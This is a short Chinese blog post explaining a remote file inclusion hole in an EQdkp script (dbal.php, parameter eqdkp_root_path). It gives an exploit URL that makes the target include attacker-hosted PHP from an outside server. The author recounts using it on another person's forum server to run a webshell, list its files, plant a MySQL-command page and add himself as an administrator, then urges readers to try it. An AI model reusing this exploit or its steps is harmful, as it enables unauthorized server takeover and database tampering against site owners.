漏洞信息：简单的说远程攻击者可以利用漏洞以WEB进程权限执行任意PHP命令。
具体情节是’dbal.php’脚本对用户提交的’eqdkp_root_path’参数缺少过滤
指定远程服务器上的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码
利用方法：http://www.cctv.com/includes/dbal.php?eqdkp_root_path=http://amxking.bokee.com/AmxKing.txt?
http://amxking.bokee.com/AmxKing.txt 是你网站是的PHP代码！ 要是E文的！


今天晚上没有睡觉，陪几位玩家一起打台球后，郁闷的发现自己的台球天赋只能维持在前两局无敌......
后来与几位哥们跑去网吧看小说，（他们都在游戏...）明显自己的阅读速度远远比作者们书写的速度快，唉，不知道“孤独坏坏”又在看什么小说了，他介绍的小说我还真的都喜欢，只是从06年开始到现在一直是痴心等待着那些作者们爬出来的佳作......
闲来无事，搜索漏洞信息，看到了上面的漏洞信息，应该是有段时间了，无奈好久没有出来混了，所以没有跟上潮流，不怕，自己玩自己的......
看了提示后，拿某个论坛做了一个测试，感觉不错，所以简单的介绍一下这个漏洞的利用。

(一)我在自己的服务器(简称A)上上传了一个php的网页Shell(应该是以前JACK 阿杰弟弟给我的那个吧！)
然后我通过别人的服务器(简称B)的DKP系统运行了A上边的Shell...
之后..我得到了B服务器的文件路径.B服务器的所有文件的名称
再之后.我在B服务器建立一个PHP网页用来执行MySQL命令
之后.我执行了一个很简单的数据插入语句.然后我想大家明白了.我对他们的论坛数据库进行了数据插入.增加了一个用户并使自己成为了管理员。

(二) 假设存在此漏洞的网站url为http://www.cctv.com，那么我们在URL后面加上代码includes/dbal.php?eqdkp_root_path=AK ,AK代表的是你
的php网页shell文件(即事先在某服务器上上传好的phpshell文件).’dbal.php’脚本对我们提交的’eqdkp_root_path’参数缺少过滤,
指定远程服务器http://www.cctv.com上的任意文件作为包含对象,可导致以WEB权限执行任意我们的PHPshell代码.也等于我们直接得到了一个phpshell网页马.
然后就可以上传东东啦:).就是这么简单,没有话说,不废话了,想尝试就迅猛吧~!